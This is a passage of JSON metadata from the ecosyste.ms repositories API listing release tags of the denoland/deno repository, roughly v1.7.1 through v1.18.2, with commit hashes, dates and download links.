cosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms